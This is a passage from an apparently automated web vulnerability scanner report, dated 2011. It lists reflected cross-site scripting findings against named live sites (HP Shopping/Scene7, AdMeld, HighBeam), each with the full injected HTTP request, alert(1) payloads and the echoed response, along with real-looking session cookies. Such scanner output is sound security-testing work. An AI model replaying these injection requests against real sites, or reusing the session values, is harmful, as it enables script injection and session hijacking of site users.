Referer: http://s7d2.scene7.com/skins/HPShopping/SWFs/genericzoom.swf?codeRoot=/is-viewers-3.7/flash&serverUrl=http://s7d2.scene7.com/is/image/&image=HPShopping/xx096av_is&skin=http://s7d2.scene7.com/skins/HPShopping/SWFs/embededHEW.swf&config=HPShopping/embedded_config&instanceName=_1300722656419&swatchRatio=2&swatchModifier=op_sharpen%3d1&initialVal=&productDemo=http://h71016.www7.hp.com/html/interactive/PavilionEliteHPE/model.html?buyNowLink=noshow%26quickspecs=default%26jumpid=re_r329_3d/DSK/PavilionEliteHPE/ProdPage/flash/CSMR/NonIDP&activeList=&.ext=.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 21 Mar 2011 15:50:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 21 Mar 2011 15:50:45 GMT
Connection: close
X-N: S

Unable to find /HPShopping/xx096av_03_10b1bf3<img src=a onerror=alert(1)>342e8add5e7

2.52. http://s7d2.scene7.com/is/image/HPShopping/xx096av_05_30 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d2.scene7.com
Path:	/is/image/HPShopping/xx096av_05_30

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b42b0<img%20src%3da%20onerror%3dalert(1)>ba1b6819c8a was submitted in the REST URL parameter 4. This input was echoed as b42b0<img src=a onerror=alert(1)>ba1b6819c8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/HPShopping/xx096av_05_30b42b0<img%20src%3da%20onerror%3dalert(1)>ba1b6819c8a?layer=comp&op_sharpen=1&req=tmb&wid=42&hei=42&wid=84&hei=84&fmt=swf HTTP/1.1
Host: s7d2.scene7.com
Proxy-Connection: keep-alive
Referer: http://s7d2.scene7.com/skins/HPShopping/SWFs/genericzoom.swf?codeRoot=/is-viewers-3.7/flash&serverUrl=http://s7d2.scene7.com/is/image/&image=HPShopping/xx096av_is&skin=http://s7d2.scene7.com/skins/HPShopping/SWFs/embededHEW.swf&config=HPShopping/embedded_config&instanceName=_1300722656419&swatchRatio=2&swatchModifier=op_sharpen%3d1&initialVal=&productDemo=http://h71016.www7.hp.com/html/interactive/PavilionEliteHPE/model.html?buyNowLink=noshow%26quickspecs=default%26jumpid=re_r329_3d/DSK/PavilionEliteHPE/ProdPage/flash/CSMR/NonIDP&activeList=&.ext=.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

2.53. http://s7d2.scene7.com/is/image/HPShopping/xx096av_06_10 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d2.scene7.com
Path:	/is/image/HPShopping/xx096av_06_10

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7da94<img%20src%3da%20onerror%3dalert(1)>0c2d9b48fde was submitted in the REST URL parameter 4. This input was echoed as 7da94<img src=a onerror=alert(1)>0c2d9b48fde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/HPShopping/xx096av_06_107da94<img%20src%3da%20onerror%3dalert(1)>0c2d9b48fde?layer=comp&op_sharpen=1&req=tmb&wid=42&hei=42&wid=84&hei=84&fmt=swf HTTP/1.1
Host: s7d2.scene7.com
Proxy-Connection: keep-alive
Referer: http://s7d2.scene7.com/skins/HPShopping/SWFs/genericzoom.swf?codeRoot=/is-viewers-3.7/flash&serverUrl=http://s7d2.scene7.com/is/image/&image=HPShopping/xx096av_is&skin=http://s7d2.scene7.com/skins/HPShopping/SWFs/embededHEW.swf&config=HPShopping/embedded_config&instanceName=_1300722656419&swatchRatio=2&swatchModifier=op_sharpen%3d1&initialVal=&productDemo=http://h71016.www7.hp.com/html/interactive/PavilionEliteHPE/model.html?buyNowLink=noshow%26quickspecs=default%26jumpid=re_r329_3d/DSK/PavilionEliteHPE/ProdPage/flash/CSMR/NonIDP&activeList=&.ext=.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

2.54. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/json/100/glamtoptier/300x250/1621082087

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6abe0<script>alert(1)</script>ace96a06a87 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glamtoptier/300x250/1621082087?url=http%3A//www.highbeam.com/iframead/display.aspx%3Fsite%3Dgale.hbr.doc%26zone%3Dp5554%26kvps%3Dpage%3Dwall%3Bcat%3Dhbr_99%3Bpub%3Dp5554%3Bpos%3Dr2%3Bchannel%3D1000000025%3Bsz%3D300x250%2C300x600%3Btile%3D2%3Bord%3D19528853%3B%26id%3Dad-r2c6cce%2522%253balert%281%29//c18ae8de3b0&callback=GlamAdmeldRenderJsAd6abe0<script>alert(1)</script>ace96a06a87&floor_price=2&container=ADMELD64226450561 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbXRvcHRpZXIiLCAgYWQ6ICAgICAgICAgICAtMSwgIG5ldHdvcms6ICAgICAgImFkbWVsZHBzYSIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjAtMCIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiOWQxZTNjNmUtNWJkMi00NjE0LWE5MzQtODQ5ZWI0YzcwZGE3IiwgIHVzZXI6ICAgICAgICAgIjYzZTJjNzc4LWYzZTEtNGQwMi04ZWUyLTI2MWRmYTY0ODQzZCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiMTYyMTA4MjA4NyIsICBkaXY6ICAgICAgICAgICI5ZDFlM2M2ZS01YmQyLTQ2MTQtYTkzNC04NDllYjRjNzBkYTciLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5oaWdoYmVhbS5jb20vaWZyYW1lYWQvZGlzcGxheS5hc3B4IiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImhvdXNlIiwgIGltcDogICAgICAgICAgMzksICBuZXR3b3JrX2lkOiAgIDAsICBhY2NvdW50X2lkOiAgIDAsICBuZXR3b3JrX25hbWU6ICJBZE1lbGQgUFNBIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZ2xhbSIsICBlY3BtOiAgICAgICAgICIyLjAwIiwgIGZlY3BtOiAgICAgICAgIjIuMDAiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgIjE2MjEwODIwODciLCAgcnVsZTogICAgICAgICAiMTYyMTA4MjA4NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIzOTg2OTMsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMzk4OTc3LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoieCsxIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjQxOTQyMCwgImJ1eSI6OTAwLCJscCI6Imh0dHA6Ly93d3cudHJhdmVsZXJzLmNvbS8iLCJhbiI6IiIsInN0YXR1cyI6IjAuNTIiLCJmaWQiOjQ2NzIsICJmY3BtIjoiMi4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHViZW1vZ3VsIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDY3MTIyNiwgImJ1eSI6ODQ3MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjQyMzM3MSwgImJ1eSI6NTIxMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzEifQ==
Content-Length: 367
Content-Type: application/javascript
Date: Mon, 21 Mar 2011 16:42:19 GMT
Connection: close

GlamAdmeldRenderJsAd6abe0<script>alert(1)</script>ace96a06a87({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":300,"height":250,"container":"ADMELD64226450561","bid":0.00,"requestId":"9d1e3c6e-5bd2-4614-a934-849eb4c70da7","views":0,"expires":
...[SNIP]...

2.55. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [container parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/json/100/glamtoptier/300x250/1621082087

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload 927bc<script>alert(1)</script>4d6e1f4e685 was submitted in the container parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glamtoptier/300x250/1621082087?url=http%3A//www.highbeam.com/iframead/display.aspx%3Fsite%3Dgale.hbr.doc%26zone%3Dp5554%26kvps%3Dpage%3Dwall%3Bcat%3Dhbr_99%3Bpub%3Dp5554%3Bpos%3Dr2%3Bchannel%3D1000000025%3Bsz%3D300x250%2C300x600%3Btile%3D2%3Bord%3D19528853%3B%26id%3Dad-r2c6cce%2522%253balert%281%29//c18ae8de3b0&callback=GlamAdmeldRenderJsAd&floor_price=2&container=ADMELD64226450561927bc<script>alert(1)</script>4d6e1f4e685 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbXRvcHRpZXIiLCAgYWQ6ICAgICAgICAgICAtMSwgIG5ldHdvcms6ICAgICAgImFkbWVsZHBzYSIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjAtMCIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNzFlNTc2YzQtZTQ2ZS00OWZiLWI1YjktYmRmYzFiZmIxNTAwIiwgIHVzZXI6ICAgICAgICAgIjYzZTJjNzc4LWYzZTEtNGQwMi04ZWUyLTI2MWRmYTY0ODQzZCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiMTYyMTA4MjA4NyIsICBkaXY6ICAgICAgICAgICI3MWU1NzZjNC1lNDZlLTQ5ZmItYjViOS1iZGZjMWJmYjE1MDAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5oaWdoYmVhbS5jb20vaWZyYW1lYWQvZGlzcGxheS5hc3B4IiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImhvdXNlIiwgIGltcDogICAgICAgICAgNDMsICBuZXR3b3JrX2lkOiAgIDAsICBhY2NvdW50X2lkOiAgIDAsICBuZXR3b3JrX25hbWU6ICJBZE1lbGQgUFNBIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZ2xhbSIsICBlY3BtOiAgICAgICAgICIyLjAwIiwgIGZlY3BtOiAgICAgICAgIjIuMDAiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgIjE2MjEwODIwODciLCAgcnVsZTogICAgICAgICAiMTYyMTA4MjA4NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIzOTg2OTMsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMzk4OTc3LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoieCsxIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjQxOTQyMCwgImJ1eSI6OTAwLCJscCI6Imh0dHA6Ly93d3cudHJhdmVsZXJzLmNvbS8iLCJhbiI6IiIsInN0YXR1cyI6IjAuNTIiLCJmaWQiOjQ2NzIsICJmY3BtIjoiMi4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHViZW1vZ3VsIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDY3MTIyNiwgImJ1eSI6ODQ3MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjQyMzM3MSwgImJ1eSI6NTIxMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzUifQ==
Content-Length: 367
Content-Type: application/javascript
Date: Mon, 21 Mar 2011 16:42:19 GMT
Connection: close

GlamAdmeldRenderJsAd({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":300,"height":250,"container":"ADMELD64226450561927bc<script>alert(1)</script>4d6e1f4e685","bid":0.00,"requestId":"71e576c4-e46e-49fb-b5b9-bdfc1bfb1500","views":0,"expires":1300725799,"creative":"<img src=\"http://tag.admeld.com/psa/adc_es_green_300x250.jpg\"/>
...[SNIP]...

2.56. http://www.highbeam.com/ControlLoader.aspx [ControlName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.highbeam.com
Path:	/ControlLoader.aspx

Issue detail

The value of the ControlName request parameter is copied into the HTML document as plain text between tags. The payload 4eaa5<script>alert(1)</script>a102e6dccb3 was submitted in the ControlName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ControlLoader.aspx?ControlName=Malt.ascx4eaa5<script>alert(1)</script>a102e6dccb3&ParentPageName=ASP.doc_aspx&DocId=1P2:675451&Publication=The%20Washington%20Post&tab=lib&publogos=True HTTP/1.1
Host: www.highbeam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/doc/1P2-675451.html
Origin: http://www.highbeam.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=viojwjqqzihswn45tvb0o0ni; FirstVisit=repeat; AxData=; Axxd=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-893885526-1300725679222
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
max-age: 0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 21 Mar 2011 16:41:31 GMT
Content-Length: 126

Sorry, your control (Malt.ascx4eaa5<script>alert(1)</script>a102e6dccb3.ascx) did not load. Error:Illegal characters in path.

2.57. http://www.highbeam.com/iframead/display.aspx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.highbeam.com
Path:	/iframead/display.aspx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6cce"%3balert(1)//c18ae8de3b0 was submitted in the id parameter. This input was echoed as c6cce";alert(1)//c18ae8de3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce"%3balert(1)//c18ae8de3b0 HTTP/1.1
Host: www.highbeam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/doc/1P2-675451.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=viojwjqqzihswn45tvb0o0ni; FirstVisit=repeat

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 21 Mar 2011 16:41:21 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...
<![CDATA[*//*---->*/
//fix iframe height
$(window).load(function() {
var frame = parent.document.getElementById("ad-r2c6cce";alert(1)//c18ae8de3b0");
if (document.body.offsetHeight) // NS 6
frame.height = document.body.offsetHeight;
if (document.body.scrollHeight) // IE 5+
frame.height = document.body.
...[SNIP]...

2.58. http://www.highbeam.com/iframead/display.aspx [kvps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.highbeam.com
Path:	/iframead/display.aspx

Issue detail

The value of the kvps request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd"style%3d"x%3aexpression(alert(1))"5d7613895c4 was submitted in the kvps parameter. This input was echoed as 7e0fd"style="x:expression(alert(1))"5d7613895c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;7e0fd"style%3d"x%3aexpression(alert(1))"5d7613895c4&id=ad-r2 HTTP/1.1
Host: www.highbeam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/doc/1P2-675451.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=viojwjqqzihswn45tvb0o0ni; FirstVisit=repeat

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 21 Mar 2011 16:41:19 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 1503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...
<script src="http://ad.doubleclick.net/adj/gale.hbr.doc/p5554;page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;7e0fd"style="x:expression(alert(1))"5d7613895c4" type="text/javascript">
...[SNIP]...

2.59. http://www.highbeam.com/iframead/display.aspx [zone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.highbeam.com
Path:	/iframead/display.aspx

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe07"style%3d"x%3aexpression(alert(1))"29f6770b2d2 was submitted in the zone parameter. This input was echoed as cfe07"style="x:expression(alert(1))"29f6770b2d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframead/display.aspx?site=gale.hbr.doc&zone=p5554cfe07"style%3d"x%3aexpression(alert(1))"29f6770b2d2&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2 HTTP/1.1
Host: www.highbeam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/doc/1P2-675451.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=viojwjqqzihswn45tvb0o0ni; FirstVisit=repeat

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 21 Mar 2011 16:41:12 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 1503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...
<script src="http://ad.doubleclick.net/adj/gale.hbr.doc/p5554cfe07"style="x:expression(alert(1))"29f6770b2d2;page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;" type="text/javascript">
...[SNIP]...

2.60. http://www.shopping.hp.com/webapp/shopping/computer_can_series.do [jumpid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/computer_can_series.do

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3664b'%3ba597c8e47c7 was submitted in the jumpid parameter. This input was echoed as 3664b';a597c8e47c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /webapp/shopping/computer_can_series.do?storeName=computer_store&category=desktops&a1=Category&v1=High+performance&series_name=HPE590t_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance/HPE590t_series3664b'%3ba597c8e47c7 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do;HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054?storeName=computer_store&landing=desktops&a1=Category&v1=High+performance&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
